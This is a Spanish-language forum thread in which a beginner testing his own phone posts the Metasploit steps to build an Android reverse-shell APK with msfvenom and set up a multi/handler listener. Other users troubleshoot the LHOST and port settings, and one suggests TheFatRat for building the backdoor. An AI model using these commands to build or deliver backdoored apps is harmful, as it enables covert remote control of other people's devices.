kali linux test vulnerabilidad en mi movil problemas al iniciar exploit

Iniciado por Szpilman, 8 Noviembre 2017, 10:56 AM

0 Miembros y 1 Visitante están viendo este tema.

Szpilman

Hola, tengo un problema en Kali linux, estoy haciendo pruebas de seguridad en mi movil, :

root@kali:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.xxxLPORT=5432 R > android.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 8809 bytes

root@kali:~# msfconsole
[-] Failed to connect to the database: could not connect to server: Connection refused
   Is the server running on host "localhost" (::1) and accepting
   TCP/IP connections on port 5432?
could not connect to server: Connection refused
   Is the server running on host "localhost" (127.0.0.1) and accepting
   TCP/IP connections on port 5432?

# cowsay++
____________
< metasploit >
------------
      \   ,__,
       \  (oo)____
          (__)    )\
             ||--|| *


      =[ metasploit v4.16.13-dev                         ]
+ -- --=[ 1697 exploits - 969 auxiliary - 299 post        ]
+ -- --=[ 500 payloads - 40 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use multi/handler
msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp
PAYLOAD => android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.xxx.xx.xxx
LHOST => 192.xxx.x.xxx
msf exploit(handler) > set LPORT 5432
LPORT => 5432
msf exploit(handler) > exploit
  • Exploit running as background job 0.

  • Started reverse TCP handler on 192.xx.xxx:5432
    msf exploit(handler) >



    Bien al escribir el comando exploit el problema aparece cuando se queda aqui y no continua.


  • Started reverse TCP handler on 192.xxx.x.xxx:5432
    msf exploit(handler) >

    Deberia aparecer otra linea en espera de activar en mi movil el archivo apk pero no aparece, no se que estoy haciendo mal.

    Tambien he probado utilizando otra ip :
    msf exploit(handler) > set LHOST 127.0.0.1
    LHHOST => 127.0.0.1
    msf exploit(handler) > set LPORT 5432
    LPORT => 5432

    Pero el resultado es este:

    [-] Exploit failed: The following options failed to validate: LHOST.
  • Exploit completed, but no session was created.



    Espero que alguien pueda ayudarme. Gracias

Avispon99

Dices que estas probando con otras ip ??
Osea que te cambias de pc?.. por que te esta pidiendo la local host...

Lo estas haciendo desde una maquina virtual?
La host local que estas probando hace ping con la maquina victima?.. especifica mas datos de como estas haciendo el pentesting...

Szpilman

Perdona estoy empezando en esto y quiero aprender, cuando hablo de dos ip me refiero a la ip local , que empieza por 192. etc. , el objetivo es mi movil, esta conectado a la misma wifi y otras lo tengo solo conectado a la red. Lo estoy haciendo desde virtual box. Que mas datos de puedo dar?


eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
       ether 08:00:27:f1:fc:39  txqueuelen 1000  (Ethernet)
       RX packets 0  bytes 0 (0.0 B)
       RX errors 0  dropped 0  overruns 0  frame 0
       TX packets 158  bytes 27732 (27.0 KiB)
       TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
       inet 127.0.0.1  netmask 255.0.0.0
       inet6 ::1  prefixlen 128  scopeid 0x10<host>
       loop  txqueuelen 1000  (Local Loopback)
       RX packets 404  bytes 31828 (31.0 KiB)
       RX errors 0  dropped 0  overruns 0  frame 0
       TX packets 404  bytes 31828 (31.0 KiB)
       TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
       inet 192.168.0.203  netmask 255.255.255.0  broadcast 192.168.0.255
       inet6 fe80::80f4:c290:e05c:d1a  prefixlen 64  scopeid 0x20<link>
       ether 94:10:3e:ac:df:29  txqueuelen 1000  (Ethernet)
       RX packets 17289  bytes 13937479 (13.2 MiB)
       RX errors 0  dropped 5072  overruns 0  frame 0
       TX packets 15172  bytes 2466021 (2.3 MiB)
       TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

skorux

¿Has revisado el peso que tiene la aplicacion?
Hay ocasiones en las que el archivo de salida pesa 0 bytes, supongo que esto es un error durante la generacion del backdoor.

Te recomiendo que utilices esta herramienta para crear la aplicacion.
https://github.com/Screetsec/TheFatRat


Rubeno953

Quería saber si habías solucionado el problema ya que me pasa exactamente lo mismo.

yum-kax

Creo que no tenes mucha idea de lo que estas haciendo.

1ero el puerto 5432 aparentemente lo usa el msf para conectarse a una db interna.. con lo cual te recomendaria que uses otro si vas a usar una direccion de localhost.. hay 65534 puertos mas para utilizar.

2do ahora que recuerdo metasploit NO permite utilizar la ip 127.0.0.1.. podes usar la 127.0.0.2 ,3 ,4 ,5 etc..
aun asi, en el campo LHOST no va la ip 127.0.0.1 sino la 192.168.0.203.

Espero que se les solucione.

PD: Intenten interpretar lo que hace el metasploit, no solo copy paste de los tutoriales, sino la curva de aprendizaje deja de ser curva y solo terminamos(me incluyo en algunso casos :silbar: ) repitiendo lo q hay en la red en vez de razonar.

Saludos.-